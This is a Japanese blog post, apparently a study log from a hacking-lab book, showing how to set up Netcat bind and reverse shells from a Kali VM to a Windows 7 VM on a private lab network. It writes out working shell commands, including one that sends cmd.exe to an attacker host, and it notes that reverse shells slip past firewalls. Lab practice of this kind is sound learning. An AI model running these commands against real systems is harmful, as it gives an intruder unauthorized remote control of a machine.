【ハッキングラボを作ろう】#3 Windows７のハッキング 2　

　IPUSIRON著「ハッキング・ラボのつくりかた 仮想環境におけるハッカー体験学習」で勉強しています。

　前回はWindows7のインストールや設定をしました。

　今回はNetcatを使ったバックドアの構築法です。

　KaliにはNetcatが最初から入っていますが、Windows7には入っていないので、まずはインストール作業を行います。

　Netcatはコマンドラインからデータを送受信するためのツールです。

（１）Netcatによるバインドシェル

　攻撃端末（Kali）からターゲット端末（Win7）に接続するタイプのシェルをバインドシェルといいます。

　　1)Windowsのシェルを指定する

　　　C:\Work>nc.exe -lvp 5555 -e cmd.exe

　　2)KaliからNetcatクライアントでアクセスする

　　　┌─(kali㉿kali)-[~]

　　　└─$ nc 192.168.56.101 5555

　　3)攻撃端末（Kali）からターゲット端末（Win7）のコマンドを実行する

　　　Win7のコマンドプロンプトがKaliのターミナルに表示されているので、好きなコマンドが打てる状態になっている。

（２）Netcatによるリバースシェル

　（１）は攻撃側からターゲット端末に接続していましたが、これだと通信経路上にファイアウォールやルータなどが存在するとブロックされてしまいますが、逆にターゲット端末から外に向かう通信はゆるいことが多くなります。このように、ターゲット端末から攻撃側端末に対して接続するタイプのシェルをリバースシェルと呼びます。

　　1)Kali側でポート番号を指定しWin７からの接続を待つ

　　┌──(kali㉿kali)-[~]

　　└─$ nc -lvp 5555

　　2)Win7から遠隔操作する

　　　C:\Work>nc.exe 192.168.56.102 5555 -e cmd.exe

　　3)攻撃端末（Kali）からターゲット端末（Win7）のコマンドを実行する

ということで、ひととおり動作を確認できました。